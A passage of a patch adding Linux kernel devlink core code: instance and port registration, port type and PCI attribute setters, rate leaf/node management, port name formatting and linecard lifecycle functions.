++	list_for_each_entry(devlink_port, &devlink->port_list, list)
++		devlink_port_notify(devlink_port, DEVLINK_CMD_PORT_NEW);
++
++	list_for_each_entry(policer_item, &devlink->trap_policer_list, list)
++		devlink_trap_policer_notify(devlink, policer_item,
++					    DEVLINK_CMD_TRAP_POLICER_NEW);
++
++	list_for_each_entry(group_item, &devlink->trap_group_list, list)
++		devlink_trap_group_notify(devlink, group_item,
++					  DEVLINK_CMD_TRAP_GROUP_NEW);
++
++	list_for_each_entry(trap_item, &devlink->trap_list, list)
++		devlink_trap_notify(devlink, trap_item, DEVLINK_CMD_TRAP_NEW);
++
++	list_for_each_entry(rate_node, &devlink->rate_list, list)
++		devlink_rate_notify(rate_node, DEVLINK_CMD_RATE_NEW);
++
++	list_for_each_entry(region, &devlink->region_list, list)
++		devlink_nl_region_notify(region, NULL, DEVLINK_CMD_REGION_NEW);
++
++	list_for_each_entry(param_item, &devlink->param_list, list)
++		devlink_param_notify(devlink, 0, param_item,
++				     DEVLINK_CMD_PARAM_NEW);
++}
++
++static void devlink_notify_unregister(struct devlink *devlink)
++{
++	struct devlink_trap_policer_item *policer_item;
++	struct devlink_trap_group_item *group_item;
++	struct devlink_param_item *param_item;
++	struct devlink_trap_item *trap_item;
++	struct devlink_port *devlink_port;
++	struct devlink_linecard *linecard;
++	struct devlink_rate *rate_node;
++	struct devlink_region *region;
++
++	list_for_each_entry_reverse(param_item, &devlink->param_list, list)
++		devlink_param_notify(devlink, 0, param_item,
++				     DEVLINK_CMD_PARAM_DEL);
++
++	list_for_each_entry_reverse(region, &devlink->region_list, list)
++		devlink_nl_region_notify(region, NULL, DEVLINK_CMD_REGION_DEL);
++
++	list_for_each_entry_reverse(rate_node, &devlink->rate_list, list)
++		devlink_rate_notify(rate_node, DEVLINK_CMD_RATE_DEL);
++
++	list_for_each_entry_reverse(trap_item, &devlink->trap_list, list)
++		devlink_trap_notify(devlink, trap_item, DEVLINK_CMD_TRAP_DEL);
++
++	list_for_each_entry_reverse(group_item, &devlink->trap_group_list, list)
++		devlink_trap_group_notify(devlink, group_item,
++					  DEVLINK_CMD_TRAP_GROUP_DEL);
++	list_for_each_entry_reverse(policer_item, &devlink->trap_policer_list,
++				    list)
++		devlink_trap_policer_notify(devlink, policer_item,
++					    DEVLINK_CMD_TRAP_POLICER_DEL);
++
++	list_for_each_entry_reverse(devlink_port, &devlink->port_list, list)
++		devlink_port_notify(devlink_port, DEVLINK_CMD_PORT_DEL);
++	list_for_each_entry_reverse(linecard, &devlink->linecard_list, list)
++		devlink_linecard_notify(linecard, DEVLINK_CMD_LINECARD_DEL);
++	devlink_notify(devlink, DEVLINK_CMD_DEL);
++}
++
++/**
++ *	devlink_register - Register devlink instance
++ *
++ *	@devlink: devlink
++ */
++void devlink_register(struct devlink *devlink)
++{
++	ASSERT_DEVLINK_NOT_REGISTERED(devlink);
++	/* Make sure that we are in .probe() routine */
++
++	xa_set_mark(&devlinks, devlink->index, DEVLINK_REGISTERED);
++	devlink_notify_register(devlink);
++}
++EXPORT_SYMBOL_GPL(devlink_register);
++
++/**
++ *	devlink_unregister - Unregister devlink instance
++ *
++ *	@devlink: devlink
++ */
++void devlink_unregister(struct devlink *devlink)
++{
++	ASSERT_DEVLINK_REGISTERED(devlink);
++	/* Make sure that we are in .remove() routine */
++
++	xa_set_mark(&devlinks, devlink->index, DEVLINK_UNREGISTERING);
++	devlink_put(devlink);
++	wait_for_completion(&devlink->comp);
++
++	devlink_notify_unregister(devlink);
++	xa_clear_mark(&devlinks, devlink->index, DEVLINK_REGISTERED);
++	xa_clear_mark(&devlinks, devlink->index, DEVLINK_UNREGISTERING);
++}
++EXPORT_SYMBOL_GPL(devlink_unregister);
++
++/**
++ *	devlink_free - Free devlink instance resources
++ *
++ *	@devlink: devlink
++ */
++void devlink_free(struct devlink *devlink)
++{
++	ASSERT_DEVLINK_NOT_REGISTERED(devlink);
++
++	mutex_destroy(&devlink->linecards_lock);
++	mutex_destroy(&devlink->reporters_lock);
++	mutex_destroy(&devlink->lock);
++	lockdep_unregister_key(&devlink->lock_key);
++	WARN_ON(!list_empty(&devlink->trap_policer_list));
++	WARN_ON(!list_empty(&devlink->trap_group_list));
++	WARN_ON(!list_empty(&devlink->trap_list));
++	WARN_ON(!list_empty(&devlink->reporter_list));
++	WARN_ON(!list_empty(&devlink->region_list));
++	WARN_ON(!list_empty(&devlink->param_list));
++	WARN_ON(!list_empty(&devlink->resource_list));
++	WARN_ON(!list_empty(&devlink->dpipe_table_list));
++	WARN_ON(!list_empty(&devlink->sb_list));
++	WARN_ON(!list_empty(&devlink->rate_list));
++	WARN_ON(!list_empty(&devlink->linecard_list));
++	WARN_ON(!list_empty(&devlink->port_list));
++
++	xa_destroy(&devlink->snapshot_ids);
++	xa_erase(&devlinks, devlink->index);
++
++	kfree(devlink);
++}
++EXPORT_SYMBOL_GPL(devlink_free);
++
++static void devlink_port_type_warn(struct work_struct *work)
++{
++	struct devlink_port *port = container_of(to_delayed_work(work),
++						 struct devlink_port,
++						 type_warn_dw);
++	dev_warn(port->devlink->dev, "Type was not set for devlink port.");
++}
++
++static bool devlink_port_type_should_warn(struct devlink_port *devlink_port)
++{
++	/* Ignore CPU and DSA flavours. */
++	return devlink_port->attrs.flavour != DEVLINK_PORT_FLAVOUR_CPU &&
++	       devlink_port->attrs.flavour != DEVLINK_PORT_FLAVOUR_DSA &&
++	       devlink_port->attrs.flavour != DEVLINK_PORT_FLAVOUR_UNUSED;
++}
++
++#define DEVLINK_PORT_TYPE_WARN_TIMEOUT (HZ * 3600)
++
++static void devlink_port_type_warn_schedule(struct devlink_port *devlink_port)
++{
++	if (!devlink_port_type_should_warn(devlink_port))
++		return;
++	/* Schedule a work to WARN in case driver does not set port
++	 * type within timeout.
++	 */
++	schedule_delayed_work(&devlink_port->type_warn_dw,
++			      DEVLINK_PORT_TYPE_WARN_TIMEOUT);
++}
++
++static void devlink_port_type_warn_cancel(struct devlink_port *devlink_port)
++{
++	if (!devlink_port_type_should_warn(devlink_port))
++		return;
++	cancel_delayed_work_sync(&devlink_port->type_warn_dw);
++}
++
++/**
++ * devlink_port_init() - Init devlink port
++ *
++ * @devlink: devlink
++ * @devlink_port: devlink port
++ *
++ * Initialize essencial stuff that is needed for functions
++ * that may be called before devlink port registration.
++ * Call to this function is optional and not needed
++ * in case the driver does not use such functions.
++ */
++void devlink_port_init(struct devlink *devlink,
++		       struct devlink_port *devlink_port)
++{
++	if (devlink_port->initialized)
++		return;
++	devlink_port->devlink = devlink;
++	INIT_LIST_HEAD(&devlink_port->region_list);
++	devlink_port->initialized = true;
++}
++EXPORT_SYMBOL_GPL(devlink_port_init);
++
++/**
++ * devlink_port_fini() - Deinitialize devlink port
++ *
++ * @devlink_port: devlink port
++ *
++ * Deinitialize essencial stuff that is in use for functions
++ * that may be called after devlink port unregistration.
++ * Call to this function is optional and not needed
++ * in case the driver does not use such functions.
++ */
++void devlink_port_fini(struct devlink_port *devlink_port)
++{
++	WARN_ON(!list_empty(&devlink_port->region_list));
++}
++EXPORT_SYMBOL_GPL(devlink_port_fini);
++
++/**
++ * devl_port_register() - Register devlink port
++ *
++ * @devlink: devlink
++ * @devlink_port: devlink port
++ * @port_index: driver-specific numerical identifier of the port
++ *
++ * Register devlink port with provided port index. User can use
++ * any indexing, even hw-related one. devlink_port structure
++ * is convenient to be embedded inside user driver private structure.
++ * Note that the caller should take care of zeroing the devlink_port
++ * structure.
++ */
++int devl_port_register(struct devlink *devlink,
++		       struct devlink_port *devlink_port,
++		       unsigned int port_index)
++{
++	devl_assert_locked(devlink);
++
++	if (devlink_port_index_exists(devlink, port_index))
++		return -EEXIST;
++
++	ASSERT_DEVLINK_PORT_NOT_REGISTERED(devlink_port);
++
++	devlink_port_init(devlink, devlink_port);
++	devlink_port->registered = true;
++	devlink_port->index = port_index;
++	spin_lock_init(&devlink_port->type_lock);
++	INIT_LIST_HEAD(&devlink_port->reporter_list);
++	mutex_init(&devlink_port->reporters_lock);
++	list_add_tail(&devlink_port->list, &devlink->port_list);
++
++	INIT_DELAYED_WORK(&devlink_port->type_warn_dw, &devlink_port_type_warn);
++	devlink_port_type_warn_schedule(devlink_port);
++	devlink_port_notify(devlink_port, DEVLINK_CMD_PORT_NEW);
++	return 0;
++}
++EXPORT_SYMBOL_GPL(devl_port_register);
++
++/**
++ *	devlink_port_register - Register devlink port
++ *
++ *	@devlink: devlink
++ *	@devlink_port: devlink port
++ *	@port_index: driver-specific numerical identifier of the port
++ *
++ *	Register devlink port with provided port index. User can use
++ *	any indexing, even hw-related one. devlink_port structure
++ *	is convenient to be embedded inside user driver private structure.
++ *	Note that the caller should take care of zeroing the devlink_port
++ *	structure.
++ *
++ *	Context: Takes and release devlink->lock <mutex>.
++ */
++int devlink_port_register(struct devlink *devlink,
++			  struct devlink_port *devlink_port,
++			  unsigned int port_index)
++{
++	int err;
++
++	devl_lock(devlink);
++	err = devl_port_register(devlink, devlink_port, port_index);
++	devl_unlock(devlink);
++	return err;
++}
++EXPORT_SYMBOL_GPL(devlink_port_register);
++
++/**
++ * devl_port_unregister() - Unregister devlink port
++ *
++ * @devlink_port: devlink port
++ */
++void devl_port_unregister(struct devlink_port *devlink_port)
++{
++	lockdep_assert_held(&devlink_port->devlink->lock);
++
++	devlink_port_type_warn_cancel(devlink_port);
++	devlink_port_notify(devlink_port, DEVLINK_CMD_PORT_DEL);
++	list_del(&devlink_port->list);
++	WARN_ON(!list_empty(&devlink_port->reporter_list));
++	mutex_destroy(&devlink_port->reporters_lock);
++	devlink_port->registered = false;
++}
++EXPORT_SYMBOL_GPL(devl_port_unregister);
++
++/**
++ *	devlink_port_unregister - Unregister devlink port
++ *
++ *	@devlink_port: devlink port
++ *
++ *	Context: Takes and release devlink->lock <mutex>.
++ */
++void devlink_port_unregister(struct devlink_port *devlink_port)
++{
++	struct devlink *devlink = devlink_port->devlink;
++
++	devl_lock(devlink);
++	devl_port_unregister(devlink_port);
++	devl_unlock(devlink);
++}
++EXPORT_SYMBOL_GPL(devlink_port_unregister);
++
++static void __devlink_port_type_set(struct devlink_port *devlink_port,
++				    enum devlink_port_type type,
++				    void *type_dev)
++{
++	ASSERT_DEVLINK_PORT_REGISTERED(devlink_port);
++
++	devlink_port_type_warn_cancel(devlink_port);
++	spin_lock_bh(&devlink_port->type_lock);
++	devlink_port->type = type;
++	devlink_port->type_dev = type_dev;
++	spin_unlock_bh(&devlink_port->type_lock);
++	devlink_port_notify(devlink_port, DEVLINK_CMD_PORT_NEW);
++}
++
++static void devlink_port_type_netdev_checks(struct devlink_port *devlink_port,
++					    struct net_device *netdev)
++{
++	const struct net_device_ops *ops = netdev->netdev_ops;
++
++	/* If driver registers devlink port, it should set devlink port
++	 * attributes accordingly so the compat functions are called
++	 * and the original ops are not used.
++	 */
++	if (ops->ndo_get_phys_port_name) {
++		/* Some drivers use the same set of ndos for netdevs
++		 * that have devlink_port registered and also for
++		 * those who don't. Make sure that ndo_get_phys_port_name
++		 * returns -EOPNOTSUPP here in case it is defined.
++		 * Warn if not.
++		 */
++		char name[IFNAMSIZ];
++		int err;
++
++		err = ops->ndo_get_phys_port_name(netdev, name, sizeof(name));
++		WARN_ON(err != -EOPNOTSUPP);
++	}
++	if (ops->ndo_get_port_parent_id) {
++		/* Some drivers use the same set of ndos for netdevs
++		 * that have devlink_port registered and also for
++		 * those who don't. Make sure that ndo_get_port_parent_id
++		 * returns -EOPNOTSUPP here in case it is defined.
++		 * Warn if not.
++		 */
++		struct netdev_phys_item_id ppid;
++		int err;
++
++		err = ops->ndo_get_port_parent_id(netdev, &ppid);
++		WARN_ON(err != -EOPNOTSUPP);
++	}
++}
++
++/**
++ *	devlink_port_type_eth_set - Set port type to Ethernet
++ *
++ *	@devlink_port: devlink port
++ *	@netdev: related netdevice
++ */
++void devlink_port_type_eth_set(struct devlink_port *devlink_port,
++			       struct net_device *netdev)
++{
++	if (netdev)
++		devlink_port_type_netdev_checks(devlink_port, netdev);
++	else
++		dev_warn(devlink_port->devlink->dev,
++			 "devlink port type for port %d set to Ethernet without a software interface reference, device type not supported by the kernel?\n",
++			 devlink_port->index);
++
++	__devlink_port_type_set(devlink_port, DEVLINK_PORT_TYPE_ETH, netdev);
++}
++EXPORT_SYMBOL_GPL(devlink_port_type_eth_set);
++
++/**
++ *	devlink_port_type_ib_set - Set port type to InfiniBand
++ *
++ *	@devlink_port: devlink port
++ *	@ibdev: related IB device
++ */
++void devlink_port_type_ib_set(struct devlink_port *devlink_port,
++			      struct ib_device *ibdev)
++{
++	__devlink_port_type_set(devlink_port, DEVLINK_PORT_TYPE_IB, ibdev);
++}
++EXPORT_SYMBOL_GPL(devlink_port_type_ib_set);
++
++/**
++ *	devlink_port_type_clear - Clear port type
++ *
++ *	@devlink_port: devlink port
++ */
++void devlink_port_type_clear(struct devlink_port *devlink_port)
++{
++	__devlink_port_type_set(devlink_port, DEVLINK_PORT_TYPE_NOTSET, NULL);
++	devlink_port_type_warn_schedule(devlink_port);
++}
++EXPORT_SYMBOL_GPL(devlink_port_type_clear);
++
++static int __devlink_port_attrs_set(struct devlink_port *devlink_port,
++				    enum devlink_port_flavour flavour)
++{
++	struct devlink_port_attrs *attrs = &devlink_port->attrs;
++
++	devlink_port->attrs_set = true;
++	attrs->flavour = flavour;
++	if (attrs->switch_id.id_len) {
++		devlink_port->switch_port = true;
++		if (WARN_ON(attrs->switch_id.id_len > MAX_PHYS_ITEM_ID_LEN))
++			attrs->switch_id.id_len = MAX_PHYS_ITEM_ID_LEN;
++	} else {
++		devlink_port->switch_port = false;
++	}
++	return 0;
++}
++
++/**
++ *	devlink_port_attrs_set - Set port attributes
++ *
++ *	@devlink_port: devlink port
++ *	@attrs: devlink port attrs
++ */
++void devlink_port_attrs_set(struct devlink_port *devlink_port,
++			    struct devlink_port_attrs *attrs)
++{
++	int ret;
++
++	ASSERT_DEVLINK_PORT_NOT_REGISTERED(devlink_port);
++
++	devlink_port->attrs = *attrs;
++	ret = __devlink_port_attrs_set(devlink_port, attrs->flavour);
++	if (ret)
++		return;
++	WARN_ON(attrs->splittable && attrs->split);
++}
++EXPORT_SYMBOL_GPL(devlink_port_attrs_set);
++
++/**
++ *	devlink_port_attrs_pci_pf_set - Set PCI PF port attributes
++ *
++ *	@devlink_port: devlink port
++ *	@controller: associated controller number for the devlink port instance
++ *	@pf: associated PF for the devlink port instance
++ *	@external: indicates if the port is for an external controller
++ */
++void devlink_port_attrs_pci_pf_set(struct devlink_port *devlink_port, u32 controller,
++				   u16 pf, bool external)
++{
++	struct devlink_port_attrs *attrs = &devlink_port->attrs;
++	int ret;
++
++	ASSERT_DEVLINK_PORT_NOT_REGISTERED(devlink_port);
++
++	ret = __devlink_port_attrs_set(devlink_port,
++				       DEVLINK_PORT_FLAVOUR_PCI_PF);
++	if (ret)
++		return;
++	attrs->pci_pf.controller = controller;
++	attrs->pci_pf.pf = pf;
++	attrs->pci_pf.external = external;
++}
++EXPORT_SYMBOL_GPL(devlink_port_attrs_pci_pf_set);
++
++/**
++ *	devlink_port_attrs_pci_vf_set - Set PCI VF port attributes
++ *
++ *	@devlink_port: devlink port
++ *	@controller: associated controller number for the devlink port instance
++ *	@pf: associated PF for the devlink port instance
++ *	@vf: associated VF of a PF for the devlink port instance
++ *	@external: indicates if the port is for an external controller
++ */
++void devlink_port_attrs_pci_vf_set(struct devlink_port *devlink_port, u32 controller,
++				   u16 pf, u16 vf, bool external)
++{
++	struct devlink_port_attrs *attrs = &devlink_port->attrs;
++	int ret;
++
++	ASSERT_DEVLINK_PORT_NOT_REGISTERED(devlink_port);
++
++	ret = __devlink_port_attrs_set(devlink_port,
++				       DEVLINK_PORT_FLAVOUR_PCI_VF);
++	if (ret)
++		return;
++	attrs->pci_vf.controller = controller;
++	attrs->pci_vf.pf = pf;
++	attrs->pci_vf.vf = vf;
++	attrs->pci_vf.external = external;
++}
++EXPORT_SYMBOL_GPL(devlink_port_attrs_pci_vf_set);
++
++/**
++ *	devlink_port_attrs_pci_sf_set - Set PCI SF port attributes
++ *
++ *	@devlink_port: devlink port
++ *	@controller: associated controller number for the devlink port instance
++ *	@pf: associated PF for the devlink port instance
++ *	@sf: associated SF of a PF for the devlink port instance
++ *	@external: indicates if the port is for an external controller
++ */
++void devlink_port_attrs_pci_sf_set(struct devlink_port *devlink_port, u32 controller,
++				   u16 pf, u32 sf, bool external)
++{
++	struct devlink_port_attrs *attrs = &devlink_port->attrs;
++	int ret;
++
++	ASSERT_DEVLINK_PORT_NOT_REGISTERED(devlink_port);
++
++	ret = __devlink_port_attrs_set(devlink_port,
++				       DEVLINK_PORT_FLAVOUR_PCI_SF);
++	if (ret)
++		return;
++	attrs->pci_sf.controller = controller;
++	attrs->pci_sf.pf = pf;
++	attrs->pci_sf.sf = sf;
++	attrs->pci_sf.external = external;
++}
++EXPORT_SYMBOL_GPL(devlink_port_attrs_pci_sf_set);
++
++/**
++ * devl_rate_leaf_create - create devlink rate leaf
++ * @devlink_port: devlink port object to create rate object on
++ * @priv: driver private data
++ *
++ * Create devlink rate object of type leaf on provided @devlink_port.
++ */
++int devl_rate_leaf_create(struct devlink_port *devlink_port, void *priv)
++{
++	struct devlink *devlink = devlink_port->devlink;
++	struct devlink_rate *devlink_rate;
++
++	devl_assert_locked(devlink_port->devlink);
++
++	if (WARN_ON(devlink_port->devlink_rate))
++		return -EBUSY;
++
++	devlink_rate = kzalloc(sizeof(*devlink_rate), GFP_KERNEL);
++	if (!devlink_rate)
++		return -ENOMEM;
++
++	devlink_rate->type = DEVLINK_RATE_TYPE_LEAF;
++	devlink_rate->devlink = devlink;
++	devlink_rate->devlink_port = devlink_port;
++	devlink_rate->priv = priv;
++	list_add_tail(&devlink_rate->list, &devlink->rate_list);
++	devlink_port->devlink_rate = devlink_rate;
++	devlink_rate_notify(devlink_rate, DEVLINK_CMD_RATE_NEW);
++
++	return 0;
++}
++EXPORT_SYMBOL_GPL(devl_rate_leaf_create);
++
++/**
++ * devl_rate_leaf_destroy - destroy devlink rate leaf
++ *
++ * @devlink_port: devlink port linked to the rate object
++ *
++ * Destroy the devlink rate object of type leaf on provided @devlink_port.
++ */
++void devl_rate_leaf_destroy(struct devlink_port *devlink_port)
++{
++	struct devlink_rate *devlink_rate = devlink_port->devlink_rate;
++
++	devl_assert_locked(devlink_port->devlink);
++	if (!devlink_rate)
++		return;
++
++	devlink_rate_notify(devlink_rate, DEVLINK_CMD_RATE_DEL);
++	if (devlink_rate->parent)
++		refcount_dec(&devlink_rate->parent->refcnt);
++	list_del(&devlink_rate->list);
++	devlink_port->devlink_rate = NULL;
++	kfree(devlink_rate);
++}
++EXPORT_SYMBOL_GPL(devl_rate_leaf_destroy);
++
++/**
++ * devl_rate_nodes_destroy - destroy all devlink rate nodes on device
++ * @devlink: devlink instance
++ *
++ * Unset parent for all rate objects and destroy all rate nodes
++ * on specified device.
++ */
++void devl_rate_nodes_destroy(struct devlink *devlink)
++{
++	static struct devlink_rate *devlink_rate, *tmp;
++	const struct devlink_ops *ops = devlink->ops;
++
++	devl_assert_locked(devlink);
++
++	list_for_each_entry(devlink_rate, &devlink->rate_list, list) {
++		if (!devlink_rate->parent)
++			continue;
++
++		refcount_dec(&devlink_rate->parent->refcnt);
++		if (devlink_rate_is_leaf(devlink_rate))
++			ops->rate_leaf_parent_set(devlink_rate, NULL, devlink_rate->priv,
++						  NULL, NULL);
++		else if (devlink_rate_is_node(devlink_rate))
++			ops->rate_node_parent_set(devlink_rate, NULL, devlink_rate->priv,
++						  NULL, NULL);
++	}
++	list_for_each_entry_safe(devlink_rate, tmp, &devlink->rate_list, list) {
++		if (devlink_rate_is_node(devlink_rate)) {
++			ops->rate_node_del(devlink_rate, devlink_rate->priv, NULL);
++			list_del(&devlink_rate->list);
++			kfree(devlink_rate->name);
++			kfree(devlink_rate);
++		}
++	}
++}
++EXPORT_SYMBOL_GPL(devl_rate_nodes_destroy);
++
++/**
++ *	devlink_port_linecard_set - Link port with a linecard
++ *
++ *	@devlink_port: devlink port
++ *	@linecard: devlink linecard
++ */
++void devlink_port_linecard_set(struct devlink_port *devlink_port,
++			       struct devlink_linecard *linecard)
++{
++	ASSERT_DEVLINK_PORT_NOT_REGISTERED(devlink_port);
++
++	devlink_port->linecard = linecard;
++}
++EXPORT_SYMBOL_GPL(devlink_port_linecard_set);
++
++static int __devlink_port_phys_port_name_get(struct devlink_port *devlink_port,
++					     char *name, size_t len)
++{
++	struct devlink_port_attrs *attrs = &devlink_port->attrs;
++	int n = 0;
++
++	if (!devlink_port->attrs_set)
++		return -EOPNOTSUPP;
++
++	switch (attrs->flavour) {
++	case DEVLINK_PORT_FLAVOUR_PHYSICAL:
++		if (devlink_port->linecard)
++			n = snprintf(name, len, "l%u",
++				     devlink_port->linecard->index);
++		if (n < len)
++			n += snprintf(name + n, len - n, "p%u",
++				      attrs->phys.port_number);
++		if (n < len && attrs->split)
++			n += snprintf(name + n, len - n, "s%u",
++				      attrs->phys.split_subport_number);
++		break;
++	case DEVLINK_PORT_FLAVOUR_CPU:
++	case DEVLINK_PORT_FLAVOUR_DSA:
++	case DEVLINK_PORT_FLAVOUR_UNUSED:
++		/* As CPU and DSA ports do not have a netdevice associated
++		 * case should not ever happen.
++		 */
++		WARN_ON(1);
++		return -EINVAL;
++	case DEVLINK_PORT_FLAVOUR_PCI_PF:
++		if (attrs->pci_pf.external) {
++			n = snprintf(name, len, "c%u", attrs->pci_pf.controller);
++			if (n >= len)
++				return -EINVAL;
++			len -= n;
++			name += n;
++		}
++		n = snprintf(name, len, "pf%u", attrs->pci_pf.pf);
++		break;
++	case DEVLINK_PORT_FLAVOUR_PCI_VF:
++		if (attrs->pci_vf.external) {
++			n = snprintf(name, len, "c%u", attrs->pci_vf.controller);
++			if (n >= len)
++				return -EINVAL;
++			len -= n;
++			name += n;
++		}
++		n = snprintf(name, len, "pf%uvf%u",
++			     attrs->pci_vf.pf, attrs->pci_vf.vf);
++		break;
++	case DEVLINK_PORT_FLAVOUR_PCI_SF:
++		if (attrs->pci_sf.external) {
++			n = snprintf(name, len, "c%u", attrs->pci_sf.controller);
++			if (n >= len)
++				return -EINVAL;
++			len -= n;
++			name += n;
++		}
++		n = snprintf(name, len, "pf%usf%u", attrs->pci_sf.pf,
++			     attrs->pci_sf.sf);
++		break;
++	case DEVLINK_PORT_FLAVOUR_VIRTUAL:
++		return -EOPNOTSUPP;
++	}
++
++	if (n >= len)
++		return -EINVAL;
++
++	return 0;
++}
++
++static int devlink_linecard_types_init(struct devlink_linecard *linecard)
++{
++	struct devlink_linecard_type *linecard_type;
++	unsigned int count;
++	int i;
++
++	count = linecard->ops->types_count(linecard, linecard->priv);
++	linecard->types = kmalloc_array(count, sizeof(*linecard_type),
++					GFP_KERNEL);
++	if (!linecard->types)
++		return -ENOMEM;
++	linecard->types_count = count;
++
++	for (i = 0; i < count; i++) {
++		linecard_type = &linecard->types[i];
++		linecard->ops->types_get(linecard, linecard->priv, i,
++					 &linecard_type->type,
++					 &linecard_type->priv);
++	}
++	return 0;
++}
++
++static void devlink_linecard_types_fini(struct devlink_linecard *linecard)
++{
++	kfree(linecard->types);
++}
++
++/**
++ *	devlink_linecard_create - Create devlink linecard
++ *
++ *	@devlink: devlink
++ *	@linecard_index: driver-specific numerical identifier of the linecard
++ *	@ops: linecards ops
++ *	@priv: user priv pointer
++ *
++ *	Create devlink linecard instance with provided linecard index.
++ *	Caller can use any indexing, even hw-related one.
++ *
++ *	Return: Line card structure or an ERR_PTR() encoded error code.
++ */
++struct devlink_linecard *
++devlink_linecard_create(struct devlink *devlink, unsigned int linecard_index,
++			const struct devlink_linecard_ops *ops, void *priv)
++{
++	struct devlink_linecard *linecard;
++	int err;
++
++	if (WARN_ON(!ops || !ops->provision || !ops->unprovision ||
++		    !ops->types_count || !ops->types_get))
++		return ERR_PTR(-EINVAL);
++
++	mutex_lock(&devlink->linecards_lock);
++	if (devlink_linecard_index_exists(devlink, linecard_index)) {
++		mutex_unlock(&devlink->linecards_lock);
++		return ERR_PTR(-EEXIST);
++	}
++
++	linecard = kzalloc(sizeof(*linecard), GFP_KERNEL);
++	if (!linecard) {
++		mutex_unlock(&devlink->linecards_lock);
++		return ERR_PTR(-ENOMEM);
++	}
++
++	linecard->devlink = devlink;
++	linecard->index = linecard_index;
++	linecard->ops = ops;
++	linecard->priv = priv;
++	linecard->state = DEVLINK_LINECARD_STATE_UNPROVISIONED;
++	mutex_init(&linecard->state_lock);
++
++	err = devlink_linecard_types_init(linecard);
++	if (err) {
++		mutex_destroy(&linecard->state_lock);
++		kfree(linecard);
++		mutex_unlock(&devlink->linecards_lock);
++		return ERR_PTR(err);
++	}
++
++	list_add_tail(&linecard->list, &devlink->linecard_list);
++	refcount_set(&linecard->refcount, 1);
++	mutex_unlock(&devlink->linecards_lock);
++	devlink_linecard_notify(linecard, DEVLINK_CMD_LINECARD_NEW);
++	return linecard;
++}
++EXPORT_SYMBOL_GPL(devlink_linecard_create);
++
++/**
++ *	devlink_linecard_destroy - Destroy devlink linecard
++ *
++ *	@linecard: devlink linecard
++ */
++void devlink_linecard_destroy(struct devlink_linecard *linecard)
++{
++	struct devlink *devlink = linecard->devlink;
++
++	devlink_linecard_notify(linecard, DEVLINK_CMD_LINECARD_DEL);
++	mutex_lock(&devlink->linecards_lock);
++	list_del(&linecard->list);
++	devlink_linecard_types_fini(linecard);
++	mutex_unlock(&devlink->linecards_lock);
++	devlink_linecard_put(linecard);
++}
++EXPORT_SYMBOL_GPL(devlink_linecard_destroy);
++
++/**
++ *	devlink_linecard_provision_set - Set provisioning on linecard
++ *
++ *	@linecard: devlink linecard
++ *	@type: linecard type
++ *
++ *	This is either called directly from the provision() op call or
++ *	as a result of the provision() op call asynchronously.
++ */
++void devlink_linecard_provision_set(struct devlink_linecard *linecard,
++				    const char *type)
++{
++	mutex_lock(&linecard->state_lock);
++	WARN_ON(linecard->type && strcmp(linecard->type, type));
++	linecard->state = DEVLINK_LINECARD_STATE_PROVISIONED;
++	linecard->type = type;
++	devlink_linecard_notify(linecard, DEVLINK_CMD_LINECARD_NEW);
++	mutex_unlock(&linecard->state_lock);
++}
++EXPORT_SYMBOL_GPL(devlink_linecard_provision_set);
++
++/**
++ *	devlink_linecard_provision_clear - Clear provisioning on linecard
++ *
++ *	@linecard: devlink linecard
++ *
++ *	This is either called directly from the unprovision() op call or
++ *	as a result of the unprovision() op call asynchronously.
++ */
++void devlink_linecard_provision_clear(struct devlink_linecard *linecard)
++{
++	mutex_lock(&linecard->state_lock);
++	WARN_ON(linecard->nested_devlink);
++	linecard->state = DEVLINK_LINECARD_STATE_UNPROVISIONED;
++	linecard->type = NULL;
++	devlink_linecard_notify(linecard, DEVLINK_CMD_LINECARD_NEW);
++	mutex_unlock(&linecard->state_lock);
++}
++EXPORT_SYMBOL_GPL(devlink_linecard_provision_clear);
++
++/**
++ *	devlink_linecard_provision_fail - Fail provisioning on linecard
++ *
++ *	@linecard: devlink linecard
++ *
++ *	This is either called directly from the provision() op call or
++ *	as a result of the provision() op call asynchronously.
++ */
++void devlink_linecard_provision_fail(struct devlink_linecard *linecard)
++{
++	mutex_lock(&linecard->state_lock);
++	WARN_ON(linecard->nested_devlink);
++	linecard->state = DEVLINK_LINECARD_STATE_PROVISIONING_FAILED;
++	devlink_linecard_notify(linecard, DEVLINK_CMD_LINECARD_NEW);
++	mutex_unlock(&linecard->state_lock);
++}
++EXPORT_SYMBOL_GPL(devlink_linecard_provision_fail);
++
++/**
++ *	devlink_linecard_activate - Set linecard active
++ *
++ *	@linecard: devlink linecard
++ */
++void devlink_linecard_activate(struct devlink_linecard *linecard)
++{
++	mutex_lock(&linecard->state_lock);
++	WARN_ON(linecard->state != DEVLINK_LINECARD_STATE_PROVISIONED);
++	linecard->state = DEVLINK_LINECARD_STATE_ACTIVE;
++	devlink_linecard_notify(linecard, DEVLINK_CMD_LINECARD_NEW);
++	mutex_unlock(&linecard->state_lock);
++}
++EXPORT_SYMBOL_GPL(devlink_linecard_activate);
++
++/**
++ *	devlink_linecard_deactivate - Set linecard inactive
++ *
++ *	@linecard: devlink linecard
++ */
++void devlink_linecard_deactivate(struct devlink_linecard *linecard)
++{
++	mutex_lock(&linecard->state_lock);
++	switch (linecard->state) {
++	case DEVLINK_LINECARD_STATE_ACTIVE:
++		linecard->state = DEVLINK_LINECARD_STATE_PROVISIONED;
++		devlink_linecard_notify(linecard, DEVLINK_CMD_LINECARD_NEW);
++		break;
++	case DEVLINK_LINECARD_STATE_UNPROVISIONING:
++		/* Line card is being deactivated as part
++		 * of unprovisioning flow.
++		 */
++		break;
++	default:
++		WARN_ON(1);
++		break;
++	}
++	mutex_unlock(&linecard->state_lock);
++}
++EXPORT_SYMBOL_GPL(devlink_linecard_deactivate);
++
++/**
++ *	devlink_linecard_nested_dl_set - Attach/detach nested devlink
++ *					 instance to linecard.
++ *
++ *	@linecard: devlink linecard
++ *	@nested_devlink: devlink instance to attach or NULL to detach
++ */
++void devlink_linecard_nested_dl_set(struct devlink_linecard *linecard,
++				    struct devlink *nested_devlink)
++{
++	mutex_lock(&linecard->state_lock);
++	linecard->nested_devlink = nested_devlink;
++	devlink_linecard_notify(linecard, DEVLINK_CMD_LINECARD_NEW);
++	mutex_unlock(&linecard->state_lock);
++}
++EXPORT_SYMBOL_GPL(devlink_linecard_nested_dl_set);
++
++int devl_sb_register(struct devlink *devlink, unsigned int sb_index,
++		     u32 size, u16 ingress_pools_count,
++		     u16 egress_pools_count, u16 ingress_tc_count,
++		     u16 egress_tc_count)
++{
++	struct devlink_sb *devlink_sb;
++
++	lockdep_assert_held(&devlink->lock);
++
